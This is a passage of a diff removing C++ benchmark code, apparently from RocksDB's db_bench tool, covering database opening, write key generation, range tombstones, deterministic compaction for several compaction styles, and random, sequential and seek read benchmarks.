-      s = DB::OpenForReadOnly(options, db_name, &db->db);
-    } else if (FLAGS_optimistic_transaction_db) {
-      s = OptimisticTransactionDB::Open(options, db_name, &db->opt_txn_db);
-      if (s.ok()) {
-        db->db = db->opt_txn_db->GetBaseDB();
-      }
-    } else if (FLAGS_transaction_db) {
-      TransactionDB* ptr;
-      TransactionDBOptions txn_db_options;
-      s = CreateLoggerFromOptions(db_name, options, &options.info_log);
-      if (s.ok()) {
-        s = TransactionDB::Open(options, txn_db_options, db_name, &ptr);
-      }
-      if (s.ok()) {
-        db->db = ptr;
-      }
-    } else if (FLAGS_use_blob_db) {
-      blob_db::BlobDBOptions blob_db_options;
-      blob_db::BlobDB* ptr;
-      s = blob_db::BlobDB::Open(options, blob_db_options, db_name, &ptr);
-      if (s.ok()) {
-        db->db = ptr;
-      }
-#endif  // ROCKSDB_LITE
-    } else {
-      s = DB::Open(options, db_name, &db->db);
-    }
-    if (!s.ok()) {
-      fprintf(stderr, "open error: %s\n", s.ToString().c_str());
-      exit(1);
-    }
-  }
-
-  enum WriteMode {
-    RANDOM, SEQUENTIAL, UNIQUE_RANDOM
-  };
-
-  void WriteSeqDeterministic(ThreadState* thread) {
-    DoDeterministicCompact(thread, open_options_.compaction_style, SEQUENTIAL);
-  }
-
-  void WriteUniqueRandomDeterministic(ThreadState* thread) {
-    DoDeterministicCompact(thread, open_options_.compaction_style,
-                           UNIQUE_RANDOM);
-  }
-
-  void WriteSeq(ThreadState* thread) {
-    DoWrite(thread, SEQUENTIAL);
-  }
-
-  void WriteRandom(ThreadState* thread) {
-    DoWrite(thread, RANDOM);
-  }
-
-  void WriteUniqueRandom(ThreadState* thread) {
-    DoWrite(thread, UNIQUE_RANDOM);
-  }
-
-  class KeyGenerator {
-   public:
-    KeyGenerator(Random64* rand, WriteMode mode,
-        uint64_t num, uint64_t num_per_set = 64 * 1024)
-      : rand_(rand),
-        mode_(mode),
-        num_(num),
-        next_(0) {
-      if (mode_ == UNIQUE_RANDOM) {
-        // NOTE: if memory consumption of this approach becomes a concern,
-        // we can either break it into pieces and only random shuffle a section
-        // each time. Alternatively, use a bit map implementation
-        // (https://reviews.facebook.net/differential/diff/54627/)
-        values_.resize(num_);
-        for (uint64_t i = 0; i < num_; ++i) {
-          values_[i] = i;
-        }
-        std::shuffle(
-            values_.begin(), values_.end(),
-            std::default_random_engine(static_cast<unsigned int>(FLAGS_seed)));
-      }
-    }
-
-    uint64_t Next() {
-      switch (mode_) {
-        case SEQUENTIAL:
-          return next_++;
-        case RANDOM:
-          return rand_->Next() % num_;
-        case UNIQUE_RANDOM:
-          assert(next_ + 1 < num_);
-          return values_[next_++];
-      }
-      assert(false);
-      return std::numeric_limits<uint64_t>::max();
-    }
-
-   private:
-    Random64* rand_;
-    WriteMode mode_;
-    const uint64_t num_;
-    uint64_t next_;
-    std::vector<uint64_t> values_;
-  };
-
-  DB* SelectDB(ThreadState* thread) {
-    return SelectDBWithCfh(thread)->db;
-  }
-
-  DBWithColumnFamilies* SelectDBWithCfh(ThreadState* thread) {
-    return SelectDBWithCfh(thread->rand.Next());
-  }
-
-  DBWithColumnFamilies* SelectDBWithCfh(uint64_t rand_int) {
-    if (db_.db != nullptr) {
-      return &db_;
-    } else  {
-      return &multi_dbs_[rand_int % multi_dbs_.size()];
-    }
-  }
-
-  void DoWrite(ThreadState* thread, WriteMode write_mode) {
-    const int test_duration = write_mode == RANDOM ? FLAGS_duration : 0;
-    const int64_t num_ops = writes_ == 0 ? num_ : writes_;
-
-    size_t num_key_gens = 1;
-    if (db_.db == nullptr) {
-      num_key_gens = multi_dbs_.size();
-    }
-    std::vector<std::unique_ptr<KeyGenerator>> key_gens(num_key_gens);
-    int64_t max_ops = num_ops * num_key_gens;
-    int64_t ops_per_stage = max_ops;
-    if (FLAGS_num_column_families > 1 && FLAGS_num_hot_column_families > 0) {
-      ops_per_stage = (max_ops - 1) / (FLAGS_num_column_families /
-                                       FLAGS_num_hot_column_families) +
-                      1;
-    }
-
-    Duration duration(test_duration, max_ops, ops_per_stage);
-    for (size_t i = 0; i < num_key_gens; i++) {
-      key_gens[i].reset(new KeyGenerator(&(thread->rand), write_mode, num_,
-                                         ops_per_stage));
-    }
-
-    if (num_ != FLAGS_num) {
-      char msg[100];
-      snprintf(msg, sizeof(msg), "(%" PRIu64 " ops)", num_);
-      thread->stats.AddMessage(msg);
-    }
-
-    RandomGenerator gen;
-    WriteBatch batch;
-    Status s;
-    int64_t bytes = 0;
-
-    std::unique_ptr<const char[]> key_guard;
-    Slice key = AllocateKey(&key_guard);
-    std::unique_ptr<const char[]> begin_key_guard;
-    Slice begin_key = AllocateKey(&begin_key_guard);
-    std::unique_ptr<const char[]> end_key_guard;
-    Slice end_key = AllocateKey(&end_key_guard);
-    std::vector<std::unique_ptr<const char[]>> expanded_key_guards;
-    std::vector<Slice> expanded_keys;
-    if (FLAGS_expand_range_tombstones) {
-      expanded_key_guards.resize(range_tombstone_width_);
-      for (auto& expanded_key_guard : expanded_key_guards) {
-        expanded_keys.emplace_back(AllocateKey(&expanded_key_guard));
-      }
-    }
-
-    int64_t stage = 0;
-    int64_t num_written = 0;
-    while (!duration.Done(entries_per_batch_)) {
-      if (duration.GetStage() != stage) {
-        stage = duration.GetStage();
-        if (db_.db != nullptr) {
-          db_.CreateNewCf(open_options_, stage);
-        } else {
-          for (auto& db : multi_dbs_) {
-            db.CreateNewCf(open_options_, stage);
-          }
-        }
-      }
-
-      size_t id = thread->rand.Next() % num_key_gens;
-      DBWithColumnFamilies* db_with_cfh = SelectDBWithCfh(id);
-      batch.Clear();
-
-      if (thread->shared->write_rate_limiter.get() != nullptr) {
-        thread->shared->write_rate_limiter->Request(
-            entries_per_batch_ * (value_size_ + key_size_), Env::IO_HIGH,
-            nullptr /* stats */, RateLimiter::OpType::kWrite);
-        // Set time at which last op finished to Now() to hide latency and
-        // sleep from rate limiter. Also, do the check once per batch, not
-        // once per write.
-        thread->stats.ResetLastOpTime();
-      }
-
-      for (int64_t j = 0; j < entries_per_batch_; j++) {
-        int64_t rand_num = key_gens[id]->Next();
-        GenerateKeyFromInt(rand_num, FLAGS_num, &key);
-        if (use_blob_db_) {
-#ifndef ROCKSDB_LITE
-          Slice val = gen.Generate(value_size_);
-          int ttl = rand() % 86400;
-          blob_db::BlobDB* blobdb =
-              static_cast<blob_db::BlobDB*>(db_with_cfh->db);
-          s = blobdb->PutWithTTL(write_options_, key, val, ttl);
-#endif  //  ROCKSDB_LITE
-        } else if (FLAGS_num_column_families <= 1) {
-          batch.Put(key, gen.Generate(value_size_));
-        } else {
-          // We use same rand_num as seed for key and column family so that we
-          // can deterministically find the cfh corresponding to a particular
-          // key while reading the key.
-          batch.Put(db_with_cfh->GetCfh(rand_num), key,
-                    gen.Generate(value_size_));
-        }
-        bytes += value_size_ + key_size_;
-        ++num_written;
-        if (writes_per_range_tombstone_ > 0 &&
-            num_written / writes_per_range_tombstone_ <=
-                max_num_range_tombstones_ &&
-            num_written % writes_per_range_tombstone_ == 0) {
-          int64_t begin_num = key_gens[id]->Next();
-          if (FLAGS_expand_range_tombstones) {
-            for (int64_t offset = 0; offset < range_tombstone_width_;
-                 ++offset) {
-              GenerateKeyFromInt(begin_num + offset, FLAGS_num,
-                                 &expanded_keys[offset]);
-              if (use_blob_db_) {
-#ifndef ROCKSDB_LITE
-                s = db_with_cfh->db->Delete(write_options_,
-                                            expanded_keys[offset]);
-#endif  //  ROCKSDB_LITE
-              } else if (FLAGS_num_column_families <= 1) {
-                batch.Delete(expanded_keys[offset]);
-              } else {
-                batch.Delete(db_with_cfh->GetCfh(rand_num),
-                             expanded_keys[offset]);
-              }
-            }
-          } else {
-            GenerateKeyFromInt(begin_num, FLAGS_num, &begin_key);
-            GenerateKeyFromInt(begin_num + range_tombstone_width_, FLAGS_num,
-                               &end_key);
-            if (use_blob_db_) {
-#ifndef ROCKSDB_LITE
-              s = db_with_cfh->db->DeleteRange(
-                  write_options_, db_with_cfh->db->DefaultColumnFamily(),
-                  begin_key, end_key);
-#endif  //  ROCKSDB_LITE
-            } else if (FLAGS_num_column_families <= 1) {
-              batch.DeleteRange(begin_key, end_key);
-            } else {
-              batch.DeleteRange(db_with_cfh->GetCfh(rand_num), begin_key,
-                                end_key);
-            }
-          }
-        }
-      }
-      if (!use_blob_db_) {
-#ifndef ROCKSDB_LITE
-        s = db_with_cfh->db->Write(write_options_, &batch);
-#endif  //  ROCKSDB_LITE
-      }
-      thread->stats.FinishedOps(db_with_cfh, db_with_cfh->db,
-                                entries_per_batch_, kWrite);
-      if (!s.ok()) {
-        fprintf(stderr, "put error: %s\n", s.ToString().c_str());
-        exit(1);
-      }
-    }
-    thread->stats.AddBytes(bytes);
-  }
-
-  Status DoDeterministicCompact(ThreadState* thread,
-                                CompactionStyle compaction_style,
-                                WriteMode write_mode) {
-#ifndef ROCKSDB_LITE
-    ColumnFamilyMetaData meta;
-    std::vector<DB*> db_list;
-    if (db_.db != nullptr) {
-      db_list.push_back(db_.db);
-    } else {
-      for (auto& db : multi_dbs_) {
-        db_list.push_back(db.db);
-      }
-    }
-    std::vector<Options> options_list;
-    for (auto db : db_list) {
-      options_list.push_back(db->GetOptions());
-      if (compaction_style != kCompactionStyleFIFO) {
-        db->SetOptions({{"disable_auto_compactions", "1"},
-                        {"level0_slowdown_writes_trigger", "400000000"},
-                        {"level0_stop_writes_trigger", "400000000"}});
-      } else {
-        db->SetOptions({{"disable_auto_compactions", "1"}});
-      }
-    }
-
-    assert(!db_list.empty());
-    auto num_db = db_list.size();
-    size_t num_levels = static_cast<size_t>(open_options_.num_levels);
-    size_t output_level = open_options_.num_levels - 1;
-    std::vector<std::vector<std::vector<SstFileMetaData>>> sorted_runs(num_db);
-    std::vector<size_t> num_files_at_level0(num_db, 0);
-    if (compaction_style == kCompactionStyleLevel) {
-      if (num_levels == 0) {
-        return Status::InvalidArgument("num_levels should be larger than 1");
-      }
-      bool should_stop = false;
-      while (!should_stop) {
-        if (sorted_runs[0].empty()) {
-          DoWrite(thread, write_mode);
-        } else {
-          DoWrite(thread, UNIQUE_RANDOM);
-        }
-        for (size_t i = 0; i < num_db; i++) {
-          auto db = db_list[i];
-          db->Flush(FlushOptions());
-          db->GetColumnFamilyMetaData(&meta);
-          if (num_files_at_level0[i] == meta.levels[0].files.size() ||
-              writes_ == 0) {
-            should_stop = true;
-            continue;
-          }
-          sorted_runs[i].emplace_back(
-              meta.levels[0].files.begin(),
-              meta.levels[0].files.end() - num_files_at_level0[i]);
-          num_files_at_level0[i] = meta.levels[0].files.size();
-          if (sorted_runs[i].back().size() == 1) {
-            should_stop = true;
-            continue;
-          }
-          if (sorted_runs[i].size() == output_level) {
-            auto& L1 = sorted_runs[i].back();
-            L1.erase(L1.begin(), L1.begin() + L1.size() / 3);
-            should_stop = true;
-            continue;
-          }
-        }
-        writes_ /= static_cast<int64_t>(open_options_.max_bytes_for_level_multiplier);
-      }
-      for (size_t i = 0; i < num_db; i++) {
-        if (sorted_runs[i].size() < num_levels - 1) {
-          fprintf(stderr, "n is too small to fill %" ROCKSDB_PRIszt " levels\n", num_levels);
-          exit(1);
-        }
-      }
-      for (size_t i = 0; i < num_db; i++) {
-        auto db = db_list[i];
-        auto compactionOptions = CompactionOptions();
-        auto options = db->GetOptions();
-        MutableCFOptions mutable_cf_options(options);
-        for (size_t j = 0; j < sorted_runs[i].size(); j++) {
-          compactionOptions.output_file_size_limit =
-              mutable_cf_options.MaxFileSizeForLevel(
-                  static_cast<int>(output_level));
-          std::cout << sorted_runs[i][j].size() << std::endl;
-          db->CompactFiles(compactionOptions, {sorted_runs[i][j].back().name,
-                                               sorted_runs[i][j].front().name},
-                           static_cast<int>(output_level - j) /*level*/);
-        }
-      }
-    } else if (compaction_style == kCompactionStyleUniversal) {
-      auto ratio = open_options_.compaction_options_universal.size_ratio;
-      bool should_stop = false;
-      while (!should_stop) {
-        if (sorted_runs[0].empty()) {
-          DoWrite(thread, write_mode);
-        } else {
-          DoWrite(thread, UNIQUE_RANDOM);
-        }
-        for (size_t i = 0; i < num_db; i++) {
-          auto db = db_list[i];
-          db->Flush(FlushOptions());
-          db->GetColumnFamilyMetaData(&meta);
-          if (num_files_at_level0[i] == meta.levels[0].files.size() ||
-              writes_ == 0) {
-            should_stop = true;
-            continue;
-          }
-          sorted_runs[i].emplace_back(
-              meta.levels[0].files.begin(),
-              meta.levels[0].files.end() - num_files_at_level0[i]);
-          num_files_at_level0[i] = meta.levels[0].files.size();
-          if (sorted_runs[i].back().size() == 1) {
-            should_stop = true;
-            continue;
-          }
-          num_files_at_level0[i] = meta.levels[0].files.size();
-        }
-        writes_ =  static_cast<int64_t>(writes_* static_cast<double>(100) / (ratio + 200));
-      }
-      for (size_t i = 0; i < num_db; i++) {
-        if (sorted_runs[i].size() < num_levels) {
-          fprintf(stderr, "n is too small to fill %" ROCKSDB_PRIszt  " levels\n", num_levels);
-          exit(1);
-        }
-      }
-      for (size_t i = 0; i < num_db; i++) {
-        auto db = db_list[i];
-        auto compactionOptions = CompactionOptions();
-        auto options = db->GetOptions();
-        MutableCFOptions mutable_cf_options(options);
-        for (size_t j = 0; j < sorted_runs[i].size(); j++) {
-          compactionOptions.output_file_size_limit =
-              mutable_cf_options.MaxFileSizeForLevel(
-                  static_cast<int>(output_level));
-          db->CompactFiles(
-              compactionOptions,
-              {sorted_runs[i][j].back().name, sorted_runs[i][j].front().name},
-              (output_level > j ? static_cast<int>(output_level - j)
-                                : 0) /*level*/);
-        }
-      }
-    } else if (compaction_style == kCompactionStyleFIFO) {
-      if (num_levels != 1) {
-        return Status::InvalidArgument(
-          "num_levels should be 1 for FIFO compaction");
-      }
-      if (FLAGS_num_multi_db != 0) {
-        return Status::InvalidArgument("Doesn't support multiDB");
-      }
-      auto db = db_list[0];
-      std::vector<std::string> file_names;
-      while (true) {
-        if (sorted_runs[0].empty()) {
-          DoWrite(thread, write_mode);
-        } else {
-          DoWrite(thread, UNIQUE_RANDOM);
-        }
-        db->Flush(FlushOptions());
-        db->GetColumnFamilyMetaData(&meta);
-        auto total_size = meta.levels[0].size;
-        if (total_size >=
-          db->GetOptions().compaction_options_fifo.max_table_files_size) {
-          for (auto file_meta : meta.levels[0].files) {
-            file_names.emplace_back(file_meta.name);
-          }
-          break;
-        }
-      }
-      // TODO(shuzhang1989): Investigate why CompactFiles not working
-      // auto compactionOptions = CompactionOptions();
-      // db->CompactFiles(compactionOptions, file_names, 0);
-      auto compactionOptions = CompactRangeOptions();
-      db->CompactRange(compactionOptions, nullptr, nullptr);
-    } else {
-      fprintf(stdout,
-              "%-12s : skipped (-compaction_stype=kCompactionStyleNone)\n",
-              "filldeterministic");
-      return Status::InvalidArgument("None compaction is not supported");
-    }
-
-// Verify seqno and key range
-// Note: the seqno get changed at the max level by implementation
-// optimization, so skip the check of the max level.
-#ifndef NDEBUG
-    for (size_t k = 0; k < num_db; k++) {
-      auto db = db_list[k];
-      db->GetColumnFamilyMetaData(&meta);
-      // verify the number of sorted runs
-      if (compaction_style == kCompactionStyleLevel) {
-        assert(num_levels - 1 == sorted_runs[k].size());
-      } else if (compaction_style == kCompactionStyleUniversal) {
-        assert(meta.levels[0].files.size() + num_levels - 1 ==
-               sorted_runs[k].size());
-      } else if (compaction_style == kCompactionStyleFIFO) {
-        // TODO(gzh): FIFO compaction
-        db->GetColumnFamilyMetaData(&meta);
-        auto total_size = meta.levels[0].size;
-        assert(total_size <=
-          db->GetOptions().compaction_options_fifo.max_table_files_size);
-          break;
-      }
-
-      // verify smallest/largest seqno and key range of each sorted run
-      auto max_level = num_levels - 1;
-      int level;
-      for (size_t i = 0; i < sorted_runs[k].size(); i++) {
-        level = static_cast<int>(max_level - i);
-        SequenceNumber sorted_run_smallest_seqno = kMaxSequenceNumber;
-        SequenceNumber sorted_run_largest_seqno = 0;
-        std::string sorted_run_smallest_key, sorted_run_largest_key;
-        bool first_key = true;
-        for (auto fileMeta : sorted_runs[k][i]) {
-          sorted_run_smallest_seqno =
-              std::min(sorted_run_smallest_seqno, fileMeta.smallest_seqno);
-          sorted_run_largest_seqno =
-              std::max(sorted_run_largest_seqno, fileMeta.largest_seqno);
-          if (first_key ||
-              db->DefaultColumnFamily()->GetComparator()->Compare(
-                  fileMeta.smallestkey, sorted_run_smallest_key) < 0) {
-            sorted_run_smallest_key = fileMeta.smallestkey;
-          }
-          if (first_key ||
-              db->DefaultColumnFamily()->GetComparator()->Compare(
-                  fileMeta.largestkey, sorted_run_largest_key) > 0) {
-            sorted_run_largest_key = fileMeta.largestkey;
-          }
-          first_key = false;
-        }
-        if (compaction_style == kCompactionStyleLevel ||
-            (compaction_style == kCompactionStyleUniversal && level > 0)) {
-          SequenceNumber level_smallest_seqno = kMaxSequenceNumber;
-          SequenceNumber level_largest_seqno = 0;
-          for (auto fileMeta : meta.levels[level].files) {
-            level_smallest_seqno =
-                std::min(level_smallest_seqno, fileMeta.smallest_seqno);
-            level_largest_seqno =
-                std::max(level_largest_seqno, fileMeta.largest_seqno);
-          }
-          assert(sorted_run_smallest_key ==
-                 meta.levels[level].files.front().smallestkey);
-          assert(sorted_run_largest_key ==
-                 meta.levels[level].files.back().largestkey);
-          if (level != static_cast<int>(max_level)) {
-            // compaction at max_level would change sequence number
-            assert(sorted_run_smallest_seqno == level_smallest_seqno);
-            assert(sorted_run_largest_seqno == level_largest_seqno);
-          }
-        } else if (compaction_style == kCompactionStyleUniversal) {
-          // level <= 0 means sorted runs on level 0
-          auto level0_file =
-              meta.levels[0].files[sorted_runs[k].size() - 1 - i];
-          assert(sorted_run_smallest_key == level0_file.smallestkey);
-          assert(sorted_run_largest_key == level0_file.largestkey);
-          if (level != static_cast<int>(max_level)) {
-            assert(sorted_run_smallest_seqno == level0_file.smallest_seqno);
-            assert(sorted_run_largest_seqno == level0_file.largest_seqno);
-          }
-        }
-      }
-    }
-#endif
-    // print the size of each sorted_run
-    for (size_t k = 0; k < num_db; k++) {
-      auto db = db_list[k];
-      fprintf(stdout,
-              "---------------------- DB %" ROCKSDB_PRIszt " LSM ---------------------\n", k);
-      db->GetColumnFamilyMetaData(&meta);
-      for (auto& levelMeta : meta.levels) {
-        if (levelMeta.files.empty()) {
-          continue;
-        }
-        if (levelMeta.level == 0) {
-          for (auto& fileMeta : levelMeta.files) {
-            fprintf(stdout, "Level[%d]: %s(size: %" PRIu64 " bytes)\n",
-                    levelMeta.level, fileMeta.name.c_str(), fileMeta.size);
-          }
-        } else {
-          fprintf(stdout, "Level[%d]: %s - %s(total size: %" PRIi64 " bytes)\n",
-                  levelMeta.level, levelMeta.files.front().name.c_str(),
-                  levelMeta.files.back().name.c_str(), levelMeta.size);
-        }
-      }
-    }
-    for (size_t i = 0; i < num_db; i++) {
-      db_list[i]->SetOptions(
-          {{"disable_auto_compactions",
-            std::to_string(options_list[i].disable_auto_compactions)},
-           {"level0_slowdown_writes_trigger",
-            std::to_string(options_list[i].level0_slowdown_writes_trigger)},
-           {"level0_stop_writes_trigger",
-            std::to_string(options_list[i].level0_stop_writes_trigger)}});
-    }
-    return Status::OK();
-#else
-    fprintf(stderr, "Rocksdb Lite doesn't support filldeterministic\n");
-    return Status::NotSupported(
-        "Rocksdb Lite doesn't support filldeterministic");
-#endif  // ROCKSDB_LITE
-  }
-
-  void ReadSequential(ThreadState* thread) {
-    if (db_.db != nullptr) {
-      ReadSequential(thread, db_.db);
-    } else {
-      for (const auto& db_with_cfh : multi_dbs_) {
-        ReadSequential(thread, db_with_cfh.db);
-      }
-    }
-  }
-
-  void ReadSequential(ThreadState* thread, DB* db) {
-    ReadOptions options(FLAGS_verify_checksum, true);
-    options.tailing = FLAGS_use_tailing_iterator;
-
-    Iterator* iter = db->NewIterator(options);
-    int64_t i = 0;
-    int64_t bytes = 0;
-    for (iter->SeekToFirst(); i < reads_ && iter->Valid(); iter->Next()) {
-      bytes += iter->key().size() + iter->value().size();
-      thread->stats.FinishedOps(nullptr, db, 1, kRead);
-      ++i;
-
-      if (thread->shared->read_rate_limiter.get() != nullptr &&
-          i % 1024 == 1023) {
-        thread->shared->read_rate_limiter->Request(1024, Env::IO_HIGH,
-                                                   nullptr /* stats */,
-                                                   RateLimiter::OpType::kRead);
-      }
-    }
-
-    delete iter;
-    thread->stats.AddBytes(bytes);
-    if (FLAGS_perf_level > rocksdb::PerfLevel::kDisable) {
-      thread->stats.AddMessage(get_perf_context()->ToString());
-    }
-  }
-
-  void ReadReverse(ThreadState* thread) {
-    if (db_.db != nullptr) {
-      ReadReverse(thread, db_.db);
-    } else {
-      for (const auto& db_with_cfh : multi_dbs_) {
-        ReadReverse(thread, db_with_cfh.db);
-      }
-    }
-  }
-
-  void ReadReverse(ThreadState* thread, DB* db) {
-    Iterator* iter = db->NewIterator(ReadOptions(FLAGS_verify_checksum, true));
-    int64_t i = 0;
-    int64_t bytes = 0;
-    for (iter->SeekToLast(); i < reads_ && iter->Valid(); iter->Prev()) {
-      bytes += iter->key().size() + iter->value().size();
-      thread->stats.FinishedOps(nullptr, db, 1, kRead);
-      ++i;
-      if (thread->shared->read_rate_limiter.get() != nullptr &&
-          i % 1024 == 1023) {
-        thread->shared->read_rate_limiter->Request(1024, Env::IO_HIGH,
-                                                   nullptr /* stats */,
-                                                   RateLimiter::OpType::kRead);
-      }
-    }
-    delete iter;
-    thread->stats.AddBytes(bytes);
-  }
-
-  void ReadRandomFast(ThreadState* thread) {
-    int64_t read = 0;
-    int64_t found = 0;
-    int64_t nonexist = 0;
-    ReadOptions options(FLAGS_verify_checksum, true);
-    std::unique_ptr<const char[]> key_guard;
-    Slice key = AllocateKey(&key_guard);
-    std::string value;
-    DB* db = SelectDBWithCfh(thread)->db;
-
-    int64_t pot = 1;
-    while (pot < FLAGS_num) {
-      pot <<= 1;
-    }
-
-    Duration duration(FLAGS_duration, reads_);
-    do {
-      for (int i = 0; i < 100; ++i) {
-        int64_t key_rand = thread->rand.Next() & (pot - 1);
-        GenerateKeyFromInt(key_rand, FLAGS_num, &key);
-        ++read;
-        auto status = db->Get(options, key, &value);
-        if (status.ok()) {
-          ++found;
-        } else if (!status.IsNotFound()) {
-          fprintf(stderr, "Get returned an error: %s\n",
-                  status.ToString().c_str());
-          abort();
-        }
-        if (key_rand >= FLAGS_num) {
-          ++nonexist;
-        }
-      }
-      if (thread->shared->read_rate_limiter.get() != nullptr) {
-        thread->shared->read_rate_limiter->Request(
-            100, Env::IO_HIGH, nullptr /* stats */, RateLimiter::OpType::kRead);
-      }
-
-      thread->stats.FinishedOps(nullptr, db, 100, kRead);
-    } while (!duration.Done(100));
-
-    char msg[100];
-    snprintf(msg, sizeof(msg), "(%" PRIu64 " of %" PRIu64 " found, "
-             "issued %" PRIu64 " non-exist keys)\n",
-             found, read, nonexist);
-
-    thread->stats.AddMessage(msg);
-
-    if (FLAGS_perf_level > rocksdb::PerfLevel::kDisable) {
-      thread->stats.AddMessage(get_perf_context()->ToString());
-    }
-  }
-
-  int64_t GetRandomKey(Random64* rand) {
-    uint64_t rand_int = rand->Next();
-    int64_t key_rand;
-    if (read_random_exp_range_ == 0) {
-      key_rand = rand_int % FLAGS_num;
-    } else {
-      const uint64_t kBigInt = static_cast<uint64_t>(1U) << 62;
-      long double order = -static_cast<long double>(rand_int % kBigInt) /
-                          static_cast<long double>(kBigInt) *
-                          read_random_exp_range_;
-      long double exp_ran = std::exp(order);
-      uint64_t rand_num =
-          static_cast<int64_t>(exp_ran * static_cast<long double>(FLAGS_num));
-      // Map to a different number to avoid locality.
-      const uint64_t kBigPrime = 0x5bd1e995;
-      // Overflow is like %(2^64). Will have little impact of results.
-      key_rand = static_cast<int64_t>((rand_num * kBigPrime) % FLAGS_num);
-    }
-    return key_rand;
-  }
-
-  void ReadRandom(ThreadState* thread) {
-    int64_t read = 0;
-    int64_t found = 0;
-    int64_t bytes = 0;
-    ReadOptions options(FLAGS_verify_checksum, true);
-    std::unique_ptr<const char[]> key_guard;
-    Slice key = AllocateKey(&key_guard);
-    PinnableSlice pinnable_val;
-
-    Duration duration(FLAGS_duration, reads_);
-    while (!duration.Done(1)) {
-      DBWithColumnFamilies* db_with_cfh = SelectDBWithCfh(thread);
-      // We use same key_rand as seed for key and column family so that we can
-      // deterministically find the cfh corresponding to a particular key, as it
-      // is done in DoWrite method.
-      int64_t key_rand = GetRandomKey(&thread->rand);
-      GenerateKeyFromInt(key_rand, FLAGS_num, &key);
-      read++;
-      Status s;
-      if (FLAGS_num_column_families > 1) {
-        s = db_with_cfh->db->Get(options, db_with_cfh->GetCfh(key_rand), key,
-                                 &pinnable_val);
-      } else {
-        pinnable_val.Reset();
-        s = db_with_cfh->db->Get(options,
-                                 db_with_cfh->db->DefaultColumnFamily(), key,
-                                 &pinnable_val);
-      }
-      if (s.ok()) {
-        found++;
-        bytes += key.size() + pinnable_val.size();
-      } else if (!s.IsNotFound()) {
-        fprintf(stderr, "Get returned an error: %s\n", s.ToString().c_str());
-        abort();
-      }
-
-      if (thread->shared->read_rate_limiter.get() != nullptr &&
-          read % 256 == 255) {
-        thread->shared->read_rate_limiter->Request(
-            256, Env::IO_HIGH, nullptr /* stats */, RateLimiter::OpType::kRead);
-      }
-
-      thread->stats.FinishedOps(db_with_cfh, db_with_cfh->db, 1, kRead);
-    }
-
-    char msg[100];
-    snprintf(msg, sizeof(msg), "(%" PRIu64 " of %" PRIu64 " found)\n",
-             found, read);
-
-    thread->stats.AddBytes(bytes);
-    thread->stats.AddMessage(msg);
-
-    if (FLAGS_perf_level > rocksdb::PerfLevel::kDisable) {
-      thread->stats.AddMessage(get_perf_context()->ToString());
-    }
-  }
-
-  // Calls MultiGet over a list of keys from a random distribution.
-  // Returns the total number of keys found.
-  void MultiReadRandom(ThreadState* thread) {
-    int64_t read = 0;
-    int64_t num_multireads = 0;
-    int64_t found = 0;
-    ReadOptions options(FLAGS_verify_checksum, true);
-    std::vector<Slice> keys;
-    std::vector<std::unique_ptr<const char[]> > key_guards;
-    std::vector<std::string> values(entries_per_batch_);
-    while (static_cast<int64_t>(keys.size()) < entries_per_batch_) {
-      key_guards.push_back(std::unique_ptr<const char[]>());
-      keys.push_back(AllocateKey(&key_guards.back()));
-    }
-
-    Duration duration(FLAGS_duration, reads_);
-    while (!duration.Done(1)) {
-      DB* db = SelectDB(thread);
-      for (int64_t i = 0; i < entries_per_batch_; ++i) {
-        GenerateKeyFromInt(GetRandomKey(&thread->rand), FLAGS_num, &keys[i]);
-      }
-      std::vector<Status> statuses = db->MultiGet(options, keys, &values);
-      assert(static_cast<int64_t>(statuses.size()) == entries_per_batch_);
-
-      read += entries_per_batch_;
-      num_multireads++;
-      for (int64_t i = 0; i < entries_per_batch_; ++i) {
-        if (statuses[i].ok()) {
-          ++found;
-        } else if (!statuses[i].IsNotFound()) {
-          fprintf(stderr, "MultiGet returned an error: %s\n",
-                  statuses[i].ToString().c_str());
-          abort();
-        }
-      }
-      if (thread->shared->read_rate_limiter.get() != nullptr &&
-          num_multireads % 256 == 255) {
-        thread->shared->read_rate_limiter->Request(
-            256 * entries_per_batch_, Env::IO_HIGH, nullptr /* stats */,
-            RateLimiter::OpType::kRead);
-      }
-      thread->stats.FinishedOps(nullptr, db, entries_per_batch_, kRead);
-    }
-
-    char msg[100];
-    snprintf(msg, sizeof(msg), "(%" PRIu64 " of %" PRIu64 " found)",
-             found, read);
-    thread->stats.AddMessage(msg);
-  }
-
-  void IteratorCreation(ThreadState* thread) {
-    Duration duration(FLAGS_duration, reads_);
-    ReadOptions options(FLAGS_verify_checksum, true);
-    while (!duration.Done(1)) {
-      DB* db = SelectDB(thread);
-      Iterator* iter = db->NewIterator(options);
-      delete iter;
-      thread->stats.FinishedOps(nullptr, db, 1, kOthers);
-    }
-  }
-
-  void IteratorCreationWhileWriting(ThreadState* thread) {
-    if (thread->tid > 0) {
-      IteratorCreation(thread);
-    } else {
-      BGWriter(thread, kWrite);
-    }
-  }
-
-  void SeekRandom(ThreadState* thread) {
-    int64_t read = 0;
-    int64_t found = 0;
-    int64_t bytes = 0;
-    ReadOptions options(FLAGS_verify_checksum, true);
-    options.tailing = FLAGS_use_tailing_iterator;
-
-    Iterator* single_iter = nullptr;
-    std::vector<Iterator*> multi_iters;
-    if (db_.db != nullptr) {
-      single_iter = db_.db->NewIterator(options);
-    } else {
-      for (const auto& db_with_cfh : multi_dbs_) {
-        multi_iters.push_back(db_with_cfh.db->NewIterator(options));
-      }
-    }
-
-    std::unique_ptr<const char[]> key_guard;
-    Slice key = AllocateKey(&key_guard);
-
-    Duration duration(FLAGS_duration, reads_);
-    char value_buffer[256];
-    while (!duration.Done(1)) {
-      if (!FLAGS_use_tailing_iterator) {
-        if (db_.db != nullptr) {
-          delete single_iter;
-          single_iter = db_.db->NewIterator(options);
-        } else {
-          for (auto iter : multi_iters) {
-            delete iter;
-          }
-          multi_iters.clear();
-          for (const auto& db_with_cfh : multi_dbs_) {
-            multi_iters.push_back(db_with_cfh.db->NewIterator(options));
-          }
-        }
-      }
-      // Pick a Iterator to use
-      Iterator* iter_to_use = single_iter;
-      if (single_iter == nullptr) {
-        iter_to_use = multi_iters[thread->rand.Next() % multi_iters.size()];
-      }
-
-      GenerateKeyFromInt(thread->rand.Next() % FLAGS_num, FLAGS_num, &key);
-      iter_to_use->Seek(key);
-      read++;
-      if (iter_to_use->Valid() && iter_to_use->key().compare(key) == 0) {
-        found++;
-      }
-
-      for (int j = 0; j < FLAGS_seek_nexts && iter_to_use->Valid(); ++j) {
-        // Copy out iterator's value to make sure we read them.
-        Slice value = iter_to_use->value();
-        memcpy(value_buffer, value.data(),
-               std::min(value.size(), sizeof(value_buffer)));
